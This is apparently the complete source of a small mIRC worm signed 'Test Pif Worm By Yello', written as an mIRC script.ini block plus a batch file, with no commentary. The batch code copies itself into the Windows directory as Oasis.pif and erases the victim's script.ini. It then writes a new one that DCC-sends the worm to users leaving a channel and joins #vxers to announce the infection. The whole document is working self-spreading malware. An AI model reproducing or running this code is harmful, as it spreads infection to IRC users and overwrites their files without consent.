 [script]
 n0=on 1:CONNECT:{
 n1= /run command.com /c C:\Oasis.bat
 n2= /exit }

 ;Bat Shit

 if file exist C:\mirc\script.ini set mIRC=C:\mirc\
 if file exist C:\progra~1\mirc\script.ini set mIRC=C:\progra~1\mirc\
 if file exist D:\mirc\script.ini set mIRC=D:\mirc\ 
 if file exist D:\progra~1\mirc\script.ini set mIRC=D:\progra~1\mirc\ 
 if file exist E:\mirc\script.ini set mIRC=E:\mirc\ 
 if file exist E:\progra~1\mirc\script.ini set mIRC=E:\progra~1\mirc\ 

 Copy %0 %windir%\Oasis.pif
 Erase %mIRC%script.ini
 Echo [script] >%mIRC%script.ini
 Echo n0=on 1:PART:#: if ( $me != $nick ) { /dcc send $nick %windir%\Oasis.pif } >>%mIRC%script.ini
 Echo n1=on 1:CONNECT: { >>%mIRC%script.ini
 Echo n2= /join #vxers >>%mIRC%script.ini
 Echo n3= /msg #vxers -=:[ Look At The Stars, Look How They Shine For You ]:=->>%mIRC%script.ini
 Echo n4= /part #vxers >>%mIRC%script.ini
 Echo n5= /clear >>%mIRC%script.ini
 Echo n6= /motd >>%mIRC%script.ini
 Echo n7= } >>%mIRC%script.ini
 ;Test Pif Worm By Yello
















